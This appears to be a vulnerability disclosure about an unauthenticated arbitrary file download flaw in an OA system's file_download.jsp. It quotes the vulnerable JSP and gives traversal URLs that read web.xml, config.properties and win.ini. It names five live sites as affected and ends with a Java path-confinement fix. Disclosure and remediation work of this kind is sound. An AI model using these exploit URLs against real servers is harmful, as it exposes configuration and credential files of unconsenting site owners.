Testing found that this system has an arbitrary file download vulnerability, and no login is required to exploit it.
Vulnerable files:
/oa/admin/application/file_download.jsp?filePath=http://x.x.x.x:7890/oa/fileDownload.do?type=File&path=/../webapp/WEB-INF/web.xml
/../oaconsole/config/config.properties
c:\windows\win.ini
Part of the vulnerable code (HTML entities in the page decoded; comments added for readability):
<%@ page import="java.util.Calendar,org.springside.core.Constants,cn.firstsoft.firstframe.admin.Environment"%><%
<%-- filePath is taken straight from the request and used as-is; nothing confines it to a download directory --%>
String logPath = request.getParameter("filePath")==null?"D:\\KingdeeOA\\Tomcat_5.5\\logs\\catalina.2007-12-29.log ":request.getParameter("filePath");
String contentType = request.getParameter("contentType")==null?"application/x-download":request.getParameter("contentType");
String fileName = request.getParameter("fileName")==null?"file.txt":request.getParameter("fileName");
java.io.OutputStream ou = null;
java.io.InputStream is = null;
try {
    java.io.File logFile = new java.io.File(logPath);
    if (logFile.exists()) {
        <%-- any readable file on the server is streamed back as an attachment --%>
        is = new java.io.FileInputStream(logPath);
        byte[] content = new byte[1024];
        int i = 0;
        response.setContentType(contentType);
        ou = response.getOutputStream();
        response.setHeader("Content-Disposition", "attachment; filename=\"" + fileName + "\"");
        while ((i = is.read(content)) != -1) {
            ou.write(content, 0, i);
        }
        ou.flush();
    } else {
        out.println("file not found:" + logPath);
    }
} catch (Exception e) {
    System.out.println(e);
} finally {
    if (ou != null) ou.close();
    if (is != null) is.close();
}
%>
An obvious arbitrary file download vulnerability; any instance found on the internet can be used to demonstrate it.
http://oa.xpngs.com/oa/admin/application/file_download.jsp?filePath&#61;c:\windows\win.ini
Accessing this URL directly downloads the file; it is saved under the name file.txt.
5 cases:
http://oa.xpngs.com/oa/themes/mskin/login/login.jsp
http://newoa.qingyitang.com:7890/oa/themes/mskin/login/login.jsp
http://wt.zhengtongauto.com/oa/themes/mskin/login/login.jsp
http://113.106.196.36:7890/oa/themes/mskin/login/login.jsp?login_error=quit
http://www.jrxoa.com/oa/themes/mskin/login/login.jsp
Proof of vulnerability:
The downloaded file
Fix:
Filter the input.
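One way to do that filtering, as an added example that is not part of the original report or the vendor's code: confine filePath to a fixed download directory, canonicalize it so ".." and symlinks cannot escape, and sanitize the name echoed into Content-Disposition. The base directory and the sample file are assumptions constructed for the demo.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

public class SafeDownload {

    /** Resolve a user-supplied name against baseDir; reject anything that leaves it. */
    public static Path resolveSafely(Path baseDir, String requested) throws IOException {
        if (requested == null || requested.isEmpty()) {
            throw new IllegalArgumentException("filePath is required");
        }
        // Drive letters (c:\...) and URL schemes (http://...) are never valid relative names.
        if (requested.contains(":")) {
            throw new SecurityException("absolute or scheme-prefixed path rejected");
        }
        Path base = baseDir.toRealPath();
        // normalize() folds "..", so a traversal attempt lands outside base and fails startsWith.
        Path candidate = base.resolve(requested).normalize();
        if (!candidate.startsWith(base)) {
            throw new SecurityException("path escapes base directory");
        }
        if (!Files.isRegularFile(candidate)) {
            throw new IOException("file not found");
        }
        // toRealPath() follows symlinks: a link inside base that points outside is caught here.
        Path real = candidate.toRealPath();
        if (!real.startsWith(base)) {
            throw new SecurityException("symlink escapes base directory");
        }
        return real;
    }

    /** Keep only a conservative character set in the name echoed into Content-Disposition. */
    public static String safeFileName(String name) {
        String cleaned = name == null ? "" : name.replaceAll("[^A-Za-z0-9._-]", "_");
        return cleaned.isEmpty() ? "file.txt" : cleaned;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sandbox (assumption): a temp directory holding one legitimate file.
        Path base = Files.createTempDirectory("oa-downloads");
        Files.write(base.resolve("report.txt"), "ok".getBytes());
        String[] probes = { "report.txt", "../webapp/WEB-INF/web.xml", "c:\\windows\\win.ini" };
        for (String p : probes) {
            try {
                System.out.println(p + " -> served " + resolveSafely(base, p));
            } catch (Exception e) {
                System.out.println(p + " -> rejected (" + e.getMessage() + ")");
            }
        }
        System.out.println(safeFileName("x\"; y=\"z"));
    }
}
```

In the JSP, replace the raw `new java.io.File(logPath)` with `resolveSafely(baseDir, logPath)` and pass `fileName` through `safeFileName` before building the header.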